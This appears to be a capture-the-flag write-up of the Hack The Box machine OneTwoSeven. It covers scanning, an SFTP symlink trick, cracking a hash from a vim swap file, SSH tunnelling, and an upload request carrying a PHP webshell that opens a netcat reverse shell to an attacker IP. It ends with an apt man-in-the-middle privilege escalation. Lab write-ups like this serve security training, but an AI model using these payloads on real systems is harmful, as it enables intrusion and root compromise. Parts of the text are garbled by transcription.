# **Nmap**

```
nmap -sC -sV -oA nmap/onetwoseven.htb 10.10.10.133
```

```
# Nmap 7.70 scan initiated Wed Apr 24 15:36:04 2019 as: nmap -Pn -sC -sV -oA
nmap/onetwoseven 10.10.10.133
Nmap scan report for 10.10.10.133
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
                    OpenSSH 7.4p1 Debian 10*deb9u6 (protocol 2.0)
22/tcp open ssh
I ssh-hostkev:
    2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
    256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
   256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
| http-title: Page moved.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at
https://nmap.org/submit/ .
# Nmap done at Wed Apr 24 15:37:22 2019 -- 1 IP address (1 host up) scanned in 77.43
```

## **SFTP**

we found a sftp login credentials on port 80 enumeration.

```
Username: ots-kMjNlZjE
Password: a6d23ef1
```

lets login in with command

```
sftp ots-kMjNlZjE@10.10.10.133
```

After some web searching and some experimenting we find that we can create sysmlnks and apache (which has more privleges that sftp will open them in url http://10.10.133/ots-kMjNlZjE/ . so create a syslnk of root directory with name nice

```
sysmlnk root /
```

Opening it in web browser at url http://10.10.10.133/ots-kMjNlZjE/root.

# Web Exploitation

#### **Obtaining hash**

On browsing the the url http://10.10.10.133/ots-kMjNlZjE/root , we find a file login.php.swp. Its a vim backup file, on viewing it, we get. a hash and of user ots-admin.

```
ots-admin
11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8
```

## **Cracking hash**

Crack it with john (pass.hash is file only containing hash)

```
john --wordlist=rockyou.txt pass.hash
```

we get password as Homesweethome1

#### SSH tunneling

Further exploring the source code we get a admin login at localhost:60080 of the remote machine. Using ssh tunneling to tunnel our localhost:60080 to remote machine localhost:60080

```
ssh -N -L 60080:127.0.0.1:60080 ots-kMjNlZjE@10.10.10.133 
 \simwe can do this as sftp is bases on ssh
```

#### **Shell Upload**

We get a login prompt after which we get a menu.php, with several php addons. After some enumeration and reading ots-addon-man, we upload reverse shell as following request. ~i use python for creating this request.

```
POST /addon-download.php/addon-upload.php HTTP/1.1
Host: 127.0.0.1:60080
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/65.0
Accept: text/html,application/xhtml*xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=-----
-1805684181392670424798019532
Content-Length: 540
DNT: 1
Connection: close
Cookie: PHPSESSID=95bpafranr5ugmd7sh8b2895p5
Upgrade-Insecure-Requests: 1
-----1805684181392670424798019532
Content-Disposition: form-data; name="addon"; filename="ots-nice.php"
Content-Type: application/x-php
<?php session start(); if (!isset ($ SESSION['username'])) { header("Location:</pre>
/login.php"); }; if ( strpos($ SERVER['REQUEST URI'], '/addons/') !== false ) { die(); };
# OneTwoSeven Admin Plugin
# OTS SHELL
echo shell exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.15.39 4444
>/tmp/f");
```

# **Privelge Escalation**

-----1805684181392670424798019532--

 $\sim$ I used LinEnum.sh as enumeration script As result of command sudo -1 we find that we run apt-get update && apt-get upgrade and change environment variable http\_proxy, so apt is our attack vector. on internet we find an apt mitm (man in the middle) vuln, so did the following steps.

- 1. Follow the blog post make the malicious deb file, Package file. we will only need these file you can ignore the rest of blog.
- 2. Create the repo stucture,

```
.:
devuan
```

```
./devuan:
dists pool
./devuan/dists:
ascii
./devuan/dists/ascii:
./devuan/dists/ascii/main:
binary-amd64
./devuan/dists/ascii/main/binary-amd64:
Packages
./devuan/pool:
main
./devuan/pool/main:
./devuan/pool/main/v:
./devuan/pool/main/v/vim:
vim 11.1.0875-3 amd64.deb
  3. Make the box proxy to us,
```

export http\_proxy=http://10.10.15.69:3128/

- 4. Proxy to a Proxy
- the box proxies to a proxy on our box, the proxy tunnels locally to port 80. ~we doing this so the second proxy uses our /etc/hosts to resolve packages.onetwoseven.htb to 127.0.0.1.
- we will use squid to listen on port 3128 (i.e default), which will forward it localhost listening on port 80
- Make appropriate changes to /etc/squid/squid.conf allow connections only to localhost host, otherwise the target box will be updated which is not good.
- Add this to squid.conf

```
acl GOOD dst 127.0.0.1
http_access allow GOOD
http access deny all
```

• Run the command to start squid service

sudo service squid start

- 5. Setting Up Server
- Edit the /etc/hosts file

127.0.0.1 packages.onetwoseven.htb

• Start the HTTP Server on Port 80

sudo python -m SimpleHTTPServer 80

# Getting root shell,

Now all you gotta do is update and upgrade the box, which update your malicious deb package, thus giving you root shell.